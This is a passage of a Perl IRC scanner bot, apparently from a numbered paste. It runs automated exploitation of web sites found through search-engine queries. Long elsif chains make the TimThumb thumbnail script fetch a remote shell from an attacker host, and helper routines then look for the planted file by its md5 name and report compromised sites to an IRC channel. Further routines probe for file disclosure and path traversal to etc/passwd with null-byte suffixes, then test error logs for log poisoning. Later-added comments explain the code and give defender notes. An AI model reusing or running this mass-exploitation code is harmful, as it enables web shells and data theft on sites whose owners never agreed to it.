  1105.                                 elsif(get_content("http://".$site.$bug."lib/script/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/script/timthumb/"; &get_content("http://".$site.$bug."lib/script/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1106.                                 elsif(get_content("http://".$site.$bug."lib/custom/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/custom/"; &get_content("http://".$site.$bug."lib/custom/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1107.                                 elsif(get_content("http://".$site.$bug."layouts/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "layouts/"; &get_content("http://".$site.$bug."layouts/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1108.                                 elsif(get_content("http://".$site.$bug."includes/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/timthumb/"; &get_content("http://".$site.$bug."includes/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1109.                                 elsif(get_content("http://".$site.$bug."custom/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "custom/"; &get_content("http://".$site.$bug."custom/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1110.                                 elsif(get_content("http://".$site.$bug."framework/includes/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/includes/"; &get_content("http://".$site.$bug."framework/includes/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1111.                                 elsif(get_content("http://".$site.$bug."framework/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/thumb/"; &get_content("http://".$site.$bug."framework/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1112.                                 elsif(get_content("http://".$site.$bug."functions/scripts/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/scripts/"; &get_content("http://".$site.$bug."functions/scripts/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1113.                                 elsif(get_content("http://".$site.$bug."functions/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/timthumb/"; &get_content("http://".$site.$bug."functions/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1114.                                 elsif(get_content("http://".$site.$bug."images/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "images/"; &get_content("http://".$site.$bug."images/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1115.                                 elsif(get_content("http://".$site.$bug."inc/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "inc/"; &get_content("http://".$site.$bug."inc/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1116.                                 elsif(get_content("http://".$site.$bug."includes/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/thumb/"; &get_content("http://".$site.$bug."includes/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1117.                                 elsif(get_content("http://".$site.$bug."/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = ""; &get_content("http://".$site.$bug."/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1118.                                 elsif(get_content("http://".$site.$bug."includes/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/"; &get_content("http://".$site.$bug."includes/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1119.                                 elsif(get_content("http://".$site.$bug."functions/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/"; &get_content("http://".$site.$bug."functions/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1120.                                 elsif(get_content("http://".$site.$bug."options/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "options/"; &get_content("http://".$site.$bug."options/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1121.                                 elsif(get_content("http://".$site.$bug."scripts/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/"; &get_content("http://".$site.$bug."scripts/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1122.                                 elsif(get_content("http://".$site.$bug."modules/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "modules/"; &get_content("http://".$site.$bug."modules/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1123.                                 elsif(get_content("http://".$site.$bug."tools/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/"; &get_content("http://".$site.$bug."tools/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1124.                                 elsif(get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "thumb/"; &get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1125.                                 elsif(get_content("http://".$site.$bug."js/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "js/"; &get_content("http://".$site.$bug."js/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1126.                                 elsif(get_content("http://".$site.$bug."lib/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/"; &get_content("http://".$site.$bug."lib/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1127.                                 elsif(get_content("http://".$site.$bug."library/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/"; &get_content("http://".$site.$bug."library/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1128.                                 elsif(get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/thumb/"; &get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1129.                                 elsif(get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/thumb/"; &get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1130.                                 elsif(get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "thumb/"; &get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1131.                                 elsif(get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/thumb/"; &get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1132.                                 elsif(get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/thumb/"; &get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1133.                                 elsif(get_content("http://".$site.$bug."library/functions/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/functions/"; &get_content("http://".$site.$bug."library/functions/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1134.                                 elsif(get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/thumb/"; &get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1135.                                 elsif(get_content("http://".$site.$bug."library/resource/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/resource/"; &get_content("http://".$site.$bug."library/resource/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1136.                                 elsif(get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/thumb/"; &get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1137.                                 elsif(get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/thumb/"; &get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1138.                                 elsif(get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/thumb/"; &get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1139.                                 elsif(get_content("http://".$site.$bug."lib/script/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/script/thumb/"; &get_content("http://".$site.$bug."lib/script/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1140.                                 elsif(get_content("http://".$site.$bug."lib/custom/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/custom/"; &get_content("http://".$site.$bug."lib/custom/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1141.                                 elsif(get_content("http://".$site.$bug."layouts/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "layouts/"; &get_content("http://".$site.$bug."layouts/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1142.                                 elsif(get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/thumb/"; &get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1143.                                 elsif(get_content("http://".$site.$bug."custom/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "custom/"; &get_content("http://".$site.$bug."custom/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1144.                                 elsif(get_content("http://".$site.$bug."framework/includes/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/includes/"; &get_content("http://".$site.$bug."framework/includes/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1145.                                 elsif(get_content("http://".$site.$bug."framework/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/thumb/"; &get_content("http://".$site.$bug."framework/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1146.                                 elsif(get_content("http://".$site.$bug."functions/scripts/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/scripts/"; &get_content("http://".$site.$bug."functions/scripts/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1147.                                 elsif(get_content("http://".$site.$bug."functions/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/thumb/"; &get_content("http://".$site.$bug."functions/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1148.                                 elsif(get_content("http://".$site.$bug."images/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "images/"; &get_content("http://".$site.$bug."images/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1149.                                 elsif(get_content("http://".$site.$bug."inc/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "inc/"; &get_content("http://".$site.$bug."inc/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1150.                                 elsif(get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/thumb/"; &get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1151.                 }
  1152.         }
  1153.  }
  1154.  
  1155. sub timrf() {
        # Fan-out for the thumb.php check (presumably TimThumb, going by the
        # "Unable to open image" test in the caller). It passes its arguments
        # on to eight probe routines: four that prepend $dir to a cache/ or
        # temp/ path, and four that use fixed wp-content/uploads/ paths.
        # Defender note: every probe is a plain GET for a .php file inside a
        # thumbnail cache/temp directory, so such requests in access logs are
        # the trace this routine leaves behind.
  1156. my ($vuln,$dir,$blog,$chan,$site,$engine) = @_;
  1157.  
  1158. &tim_xpla0($vuln,$dir,$blog,$chan,$site,$engine); &tim_xplb0($vuln,$dir,$blog,$chan,$site,$engine); &tim_xplc0($vuln,$dir,$blog,$chan,$site,$engine); &tim_xpld0($vuln,$dir,$blog,$chan,$site,$engine);
  1159. &tim_xpla2($vuln,$blog,$chan,$site,$engine); &tim_xplb2($vuln,$blog,$chan,$site,$engine); &tim_xplc2($vuln,$blog,$chan,$site,$engine); &tim_xpld2($vuln,$blog,$chan,$site,$engine);
  1160. }
  1161.  
  1162. sub tim_xpla0() {
                # Checks whether the thumbnail script stored a remote file as
                # <url><dir>cache/external_<md5>.php, where <md5> is md5_hex of
                # the string built from $mode ("sh.php" / "index.php"), i.e. the
                # value timrf's caller placed in the src= parameter.
                # Both URLs are fetched; only the first response is tested for
                # the marker "0wn3d", and a hit is reported through info_main.
                # If there is no hit, the same check is repeated without $dir.
                # $timlogo is read from outside this sub; $site is unused here.
                # Defender note: a file named external_<32 hex chars>.php under
                # a cache/ directory is the on-disk indicator. Cache directories
                # should never be allowed to execute PHP.
  1163.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1164.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."cache/external_".md5_hex($shell).".php";
  1165.         my $dur = $url.$dir."cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1166.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); }
  1167.                 else {
                        # Second attempt: same file name, cache/ directly under $url.
  1168.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."cache/external_".md5_hex($shell).".php";
  1169.                 my $dur = $url."cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1170.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); }
  1171.         }
  1172. }
  1173.                
  1174. sub tim_xplb0() {
                # Same check as tim_xpla0, but for cache file names without the
                # "external_" prefix: <url><dir>cache/<md5>.php, then
                # <url>cache/<md5>.php. The marker tested is "0wn3d"; a hit is
                # reported through info_main.
                # Defender note: look for <32 hex chars>.php files in thumbnail
                # cache/ directories and for GET requests to them.
  1175.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1176.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."cache/".md5_hex($shell).".php";
  1177.         my $dur = $url.$dir."cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1178.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1179.                 else {
                        # Second attempt without the $dir component.
  1180.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."cache/".md5_hex($shell).".php";
  1181.                 my $dur = $url."cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1182.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1183.         }
  1184. }
  1185.                
  1186. sub tim_xplc0() {
                # Variant of tim_xpla0 that looks in temp/ instead of cache/:
                # <url><dir>temp/external_<md5>.php, then <url>temp/external_<md5>.php.
                # The first response is tested for "0wn3d" and a hit is reported
                # through info_main.
                # Defender note: the same indicator applies to temp/ directories
                # used by thumbnail scripts. They should not execute PHP either.
  1187.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1188.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."temp/external_".md5_hex($shell).".php";
  1189.         my $dur = $url.$dir."temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1190.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1191.                 else {
                        # Second attempt without the $dir component.
  1192.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."temp/external_".md5_hex($shell).".php";
  1193.                 my $dur = $url."temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1194.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1195.         }
  1196. }
  1197.  
  1198. sub tim_xpld0() {
                # Variant of tim_xplb0 for temp/: <url><dir>temp/<md5>.php, then
                # <url>temp/<md5>.php. The first response is tested for "0wn3d"
                # and a hit is reported through info_main.
                # Defender note: together with tim_xpla0/b0/c0 this covers the
                # four name patterns {cache,temp}/{external_,}<md5>.php, which
                # is the set worth sweeping a docroot for.
  1199.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1200.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."temp/".md5_hex($shell).".php";
  1201.         my $dur = $url.$dir."temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1202.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1203.                 else {
                        # Second attempt without the $dir component.
  1204.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."temp/".md5_hex($shell).".php";
  1205.                 my $dur = $url."temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1206.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1207.         }
  1208. }
  1209. # /uploads/thumb-temp/
  1210. sub tim_xpla2() {
                # Fixed-path check: wp-content/uploads/thumb-temp/external_<md5>.php
                # under $url. Takes no $dir argument and makes no second attempt.
                # The first response is tested for "0wn3d" and a hit is reported
                # through info_main.
                # Defender note: PHP files under wp-content/uploads/ are not part
                # of a normal WordPress install. Block script execution there.
  1211.         my($url,$mode,$chan,$site,$engine) = @_;
  1212.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-temp/external_".md5_hex($shell).".php";
  1213.         my $dur = $url."wp-content/uploads/thumb-temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1214.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1215.                
  1216. sub tim_xplb2() {
                # Fixed-path check: wp-content/uploads/thumb-temp/<md5>.php under
                # $url (no "external_" prefix). The first response is tested for
                # "0wn3d" and a hit is reported through info_main.
  1217.         my($url,$mode,$chan,$site,$engine) = @_;
  1218.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-temp/".md5_hex($shell).".php";
  1219.         my $dur = $url."wp-content/uploads/thumb-temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1220.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); } }
  1221.  
  1222. sub tim_xplc2() {
                # Fixed-path check: wp-content/uploads/thumb-cache/external_<md5>.php
                # under $url. The first response is tested for "0wn3d" and a hit
                # is reported through info_main.
  1223.         my($url,$mode,$chan,$site,$engine) = @_;
  1224.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-cache/external_".md5_hex($shell).".php";
  1225.         my $dur = $url."wp-content/uploads/thumb-cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1226.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1227.                
  1228. sub tim_xpld2() {
                # Fixed-path check: wp-content/uploads/thumb-cache/<md5>.php under
                # $url (no "external_" prefix). The first response is tested for
                # "0wn3d" and a hit is reported through info_main.
  1229.         my($url,$mode,$chan,$site,$engine) = @_;
  1230.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-cache/".md5_hex($shell).".php";
  1231.         my $dur = $url."wp-content/uploads/thumb-cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1232.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); } }
  1233.  
  1234. ######################## LFD
  1235. sub lfd() {
                # File-disclosure scan over a search-engine result list.
                # search_engine() (defined elsewhere in the file) returns host
                # strings. For each one the sub requests
                # "http://" . $site . $bug . $lfdtest and reports to $chan via
                # msg() when the body matches the pattern held in $lfdoutput.
                # $lfdtest, $lfdoutput, $lfdlogo, $nob0dy and %conf are read from
                # outside this sub; their values are not visible in this part.
                # Defender note: the target list comes from search results, so
                # being indexed for the queried string is what puts a site on
                # it. Each tested host sees a single GET carrying $lfdtest.
  1236.         my ($chan,$bug,$dork,$engine) = @_;
  1237.     my $count = 0;
  1238.     my @list = &search_engine($chan,$bug,$dork,$engine,$lfdlogo);
  1239.     my $num = scalar(@list);
  1240.     if ($num > 0) {
  1241.         foreach my $site (@list) {
  1242.             $count++;
                    # "Finished" notice, sent when the counter reaches $num-1 and
                    # the ssdone option is set to 1.
  1243.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); } }
  1244.             my $test = "http://".$site.$bug.$lfdtest;
                    # $vuln is the same URL with extra digits inserted for display
                    # (presumably IRC colour codes - confirm against the raw paste).
  1245.             my $vuln = "http://".$site."12".$bug."6".$lfdtest;
  1246.             my $html = &get_content($test);
  1247.             if ($html =~ /$lfdoutput/) {
  1248.                 &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $nob0dy");
  1249.                 sleep(3);
  1250.             }
  1251.         }
  1252.     }
  1253. }
  1254. ######################## LFI
  1255. sub lfi() {
                # Local-file-inclusion scan over a search-engine result list:
                # every host returned by search_engine() is handed to lfi_nor()
                # together with the parameter string $bug.
                # $lfilogo and %conf are read from outside this sub.
  1256.         my ($chan,$bug,$dork,$engine) = @_;
  1257.     my $count = 0;
  1258.     my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  1259.     my $num = scalar(@list);
  1260.     if ($num > 0) {
  1261.         foreach my $site (@list) {
  1262.             $count++;
                    # "Finished" notice, sent when the counter reaches $num-1 and
                    # the ssdone option is set to 1.
  1263.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$lfilogo 12(4@0$engine12) 8==14F8=15I8=0N8=0I8=15S8=14H8== "); } }
  1264.                        
  1265.                         &lfi_nor($site,$chan,$bug,$engine);
  1266.  
  1267.                 }
  1268.         }
  1269. }
  1270.  
  1271. sub lfi_nor() {
        # Path-traversal depth probe for one host. On each of up to 25 rounds
        # it appends one more "../" to $dir and one more "....//" to $dirx,
        # then requests etc/passwd%0000 and etc/group%0000 behind each prefix,
        # first with get_content() and then with post_content(). A response
        # containing "root:x:" counts as a hit: the loop is ended by setting
        # $num to $tot, and lfi_vuln() (GET) or plfi_vuln() (POST) is called.
        # $tot, $num, $dir, $dirx and $path carry no "my", so they are not
        # lexical to this sub.
        # Defender note: the request signature is a run of "../" or "....//"
        # followed by etc/passwd or etc/group and a trailing "%0000". A filter
        # that only deletes "../" once turns "....//" back into "../", so
        # stripping is not a fix. Resolve the path and compare it against an
        # allow-list of include targets instead.
  1272. my ($site,$chan,$bug,$engine) = @_;
  1273. my $site = $_[0];
  1274. $tot = 25;
  1275.         for ($num=0;$num<$tot;$num++) {
                # The prefixes are reset on the first round only, then grow by one
                # level per round.
  1276.         if ($num == 0) {
  1277.         $dir='';
  1278.         $dirx='';
  1279.         }
  1280.                
  1281.         $dir.='../';
  1282.         $dirx.='....//';
  1283.  
  1284.         if(get_content("http://".$site.$bug.$dir."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &lfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1285.         elsif(get_content("http://".$site.$bug.$dir."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &lfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1286.         elsif(get_content("http://".$site.$bug.$dirx."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &lfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1287.         elsif(get_content("http://".$site.$bug.$dirx."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &lfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1288.         elsif(post_content("http://".$site.$bug.$dir."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &plfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1289.         elsif(post_content("http://".$site.$bug.$dir."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &plfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1290.         elsif(post_content("http://".$site.$bug.$dirx."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &plfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1291.         elsif(post_content("http://".$site.$bug.$dirx."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &plfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1292.         else {}
  1293.         }
  1294. }
  1295.  
  1296. sub lfi_vuln() {
        # Called by lfi_nor() after a GET-based hit. It announces the URL on
        # $chan via msg(), then runs the two follow-up stages lfi_logs() and
        # lfi_env() with $mode set to "get".
        # Defender note: a confirmed file read is followed at once by requests
        # for web-server error logs and proc/self/environ. Incident response
        # should treat the first hit as the start of a sequence.
  1297. my ($site,$bug,$dir,$path,$chan,$engine) = @_;
  1298. my $mode = "get";
  1299.         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@7G-VulN12)12 http://".$site.$bug.$dir.$path." ");
  1300.         &lfi_logs($site,$bug,$dir,$mode,$chan,$engine);
  1301.         &lfi_env($site,$bug,$dir,$mode,$chan,$engine);
  1302. }
  1303. sub plfi_vuln() {
        # POST counterpart of lfi_vuln(): announces the URL on $chan via msg()
        # and runs lfi_logs() and lfi_env() with $mode set to "post".
        # Defender note: the follow-up requests go through post_content(), so
        # log review must cover POST requests and not just GET query strings.
  1304. my ($site,$bug,$dir,$path,$chan,$engine) = @_;
  1305. my $mode = "post";
  1306.         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@7P-VulN12)12 http://".$site.$bug.$dir.$path." ");
  1307.         &lfi_logs($site,$bug,$dir,$mode,$chan,$engine);
  1308.         &lfi_env($site,$bug,$dir,$mode,$chan,$engine);
  1309. }
  1310.  
  1311. sub lfi_logs() {
        # Error-log readability check, run after a traversal hit.
        # Step 1: request http://<site>/0wn4g3.3u and continue only if the
        # response body contains that marker string.
        # Step 2: through the include parameter, request error_log at eleven
        # fixed locations (each with the "%0000" suffix). A location counts as
        # a hit when the response contains both "File does not exist" and the
        # marker. Each hit is passed to lfi_log_vuln_xpl() with the path in
        # $pwd. The "post" branch repeats the same list through post_content().
        # $codigo, $scanner and $pwd carry no "my", so they are not lexical
        # to this sub.
        # Defender note: a request for "/0wn4g3.3u" followed by traversal
        # requests ending in error_log is the log signature. The check only
        # succeeds where the PHP process can read the web server's error log,
        # so keeping log files unreadable to the application user removes
        # this stage.
  1312. my ($site,$bug,$dir,$mode,$chan,$engine) = @_;
  1313.         $codigo = "/0wn4g3.3u";
  1314.         $scanner = "http://".$site.$codigo;
  1315.         if ($mode eq "get") {
  1316.                 my $req = &get_content($scanner);
  1317.                 if($req =~ /0wn4g3.3u/) {
  1318.                         if(get_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "etc/httpd/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
